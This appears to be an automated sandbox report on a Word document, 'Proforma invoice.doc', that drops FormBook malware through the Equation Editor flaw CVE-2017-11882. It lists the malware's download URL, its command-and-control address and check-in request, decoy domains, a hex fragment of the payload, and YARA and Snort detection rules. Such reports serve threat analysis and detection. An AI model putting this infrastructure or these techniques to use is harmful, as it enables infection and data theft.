Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Proforma invoice.doc

Overview

General Information

Sample Name:Proforma invoice.doc
Analysis ID:491373
MD5:5be61511dab1f4f76366f52ca8fec8b1
SHA1:70a6dd35d6da873242e3c56ff86f000c78614a1f
SHA256:443ffe0efb43ac5c04e23e749b2908a8e723462f409208e0f4cf35046e3b129d
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2008 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1812 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • ibefrankhq4862.exe (PID: 2032 cmdline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe MD5: 7572FBC5DE30359E833D6F382DB286FA)
      • ibefrankhq4862.exe (PID: 1320 cmdline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe MD5: 7572FBC5DE30359E833D6F382DB286FA)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • wininit.exe (PID: 2636 cmdline: C:\Windows\SysWOW64\wininit.exe MD5: B5C5DCAD3899512020D135600129D665)
            • cmd.exe (PID: 2036 cmdline: /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.ibefrankhq4862.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.ibefrankhq4862.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.ibefrankhq4862.exe.400000.1.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a39:$sqlite3step: 68 34 1C 7B E1
        • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a68:$sqlite3text: 68 38 2A 90 C5
        • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
        4.2.ibefrankhq4862.exe.28bed1c.3.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.239.243.112, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1812, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1812, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, CommandLine: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, NewProcessName: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, OriginalFileName: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1812, ProcessCommandLine: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe, ProcessId: 2032
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\wininit.exe, CommandLine: C:\Windows\SysWOW64\wininit.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wininit.exe, NewProcessName: C:\Windows\SysWOW64\wininit.exe, OriginalFileName: C:\Windows\SysWOW64\wininit.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 1764, ProcessCommandLine: C:\Windows\SysWOW64\wininit.exe, ProcessId: 2636

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.handelsbetriebposavec.com/if60/"], "decoy": ["babyjames.space", "dtjug.com", "bhagteri.com", "havplan.com", "gentlesuccess.net", "negativeminus.com", "utesm.com", "ngomen.online", "abohemianeducation.com", "hyper-quote.com", "poseidonflooring.com", "theshopdental.com", "consumelocaloficial.com", "tineue.com", "traerpolio.com", "somnambulantfarms.com", "sugarhillclassiccars.com", "brasseriedufayard.com", "replacerglass.net", "lazyguysmarketing.com", "audiofactaesthetic.com", "14551bercaw.com", "piaamsterdam.com", "coolkidssale.com", "advikaa.com", "suamui.net", "19820907.com", "ankibe.com", "barrelandlens.com", "personowner.guru", "gigexworld.com", "visionandcourage.com", "livelyselfcare.com", "hellohomeowner.com", "bestwazifaforloveback.com", "dyvikapeel.com", "ignitemyboiler.com", "photosbyamandajdaniels.com", "sofuery.com", "rawimage.net", "outtact.com", "tomura-dc.com", "tkachovagv.com", "theheavymental.com", "interfaceprosthetics.com", "publicpod.net", "investotbank.com", "fishguano.com", "livetvchannels.xyz", "trendinggk.com", "adlun.com", "studyhandbook.com", "cardinal.moe", "urbantennis.info", "jsbr.online", "simplyforus.com", "keyleadhealth.com", "aliltasteofnewyork.com", "usdigipro.com", "debbielin.com", "9921.xyz", "watdomenrendi05.com", "asustech.net", "rm-elektrotechnik.gmbh"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Proforma invoice.docReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://fantecheo.tk/ibefrankzx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exeReversingLabs: Detection: 13%
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeReversingLabs: Detection: 13%
          Source: 5.2.ibefrankhq4862.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wininit.pdb source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: ibefrankhq4862.exe, wininit.exe
          Source: global trafficDNS query: name: fantecheo.tk
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then jmp 00A4A358h
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then jmp 00A4A358h
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then jmp 00A4A358h
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\wininit.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49166 -> 34.98.99.30:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 35.246.6.109:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.urbantennis.info
          Source: C:\Windows\explorer.exeNetwork Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exeDomain query: www.lazyguysmarketing.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.handelsbetriebposavec.com/if60/
          Source: Joe Sandbox ViewASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
          Source: global trafficHTTP traffic detected: GET /if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz HTTP/1.1Host: www.lazyguysmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.239.243.112 185.239.243.112
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Mon, 27 Sep 2021 12:25:37 GMTContent-Type: application/x-msdownloadContent-Length: 863744Last-Modified: Mon, 27 Sep 2021 01:39:56 GMTConnection: keep-aliveETag: "615120ec-d2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ae 13 51 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 0b 00 00 98 01 00 00 00 00 00 66 b3 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 b3 0b 00 4f 00 00 00 00 c0 0b 00 54 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 93 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 54 94 01 00 00 c0 0b 00 00 96 01 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0d 00 00 02 00 00 00 2c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 b3 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 cc 01 00 14 53 02 00 03 00 00 00 8c 02 00 06 fc 1f 04 00 18 93 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 23 00 00 0a 2a 3a 02 28 24 00 00 0a 02 03 7d 23 00 00 0a 2a 00 13 30 03 00 24 00 00 00 01 00 00 11 03 75 01 00 00 1b 0a 06 2c 18 28 25 00 00 0a 02 7b 23 00 00 0a 06 7b 23 00 00 0a 6f 26 00 00 0a 2b 01 16 2a 76 20 8b e7 6c c3 20 29 55 55 a5 5a 28 25 00 00 0a 02 7b 23 00 00 0a 6f 27 00 00 0a 58 2a 00 00 13 30 07 00 4d 00 00 00 02 00 00 11 14 72 01 00 00 70 17 8d 17 00 00 01 25 16 02 7b 23 00 00 0a 0a 12 00 12 01 fe 15 03 00 00 1b 07 8c 03 00 00 1b 2d 14 71 03 00 00 1b 0b 12 01 07 8c 03 00 00 1b 2d 04 26 14 2b 0b fe 16 03 00 00 1b 6f 28 00 00 0a a2 28 29 00 00 0a 2a 1e 02 7b 2a 00 00 0a 2a 1e 02 7b 2b 00 00 0a 2a 56 02 28 24 00 00 0a 02 03 7d 2a 00 00 0a 02 04 7d 2b 00 00 0a 2a 00 13 30 03 00 3c 00 00 00 03 00 00 11 03 75 04 00 00 1b 0a 06 2c 30 28 25 00 00 0a 02 7b 2a 00 00 0a 06 7b 2a 00 00 0a 6f 26 00 00 0a 2c 18 28 2c 00 00 0a 02 7b 2b 00 00 0a 06 7b 2b 00 00 0a 6f 2d 00 00 0a 2b 01 16 2a d2 20 b6 70 69 7c 20 29 55 55 a5 5a 28 25 00 00 0a 02
          Source: global trafficHTTP traffic detected: GET /ibefrankzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: fantecheo.tkConnection: Keep-Alive
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: Http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.436720944.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000006.00000000.434104631.0000000001BE0000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668831534.0000000001F00000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.424935061.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp=0
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehpLh-
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: ibefrankhq4862.exe, ibefrankhq4862.exe, 00000005.00000002.449302089.00000000013A2000.00000020.00020000.sdmp, wininit.exe, 00000007.00000002.668531899.00000000002B0000.00000004.00000001.sdmpString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
          Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.492146934.0000000003D90000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.425752523.0000000003D90000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.430241392.00000000083E7000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
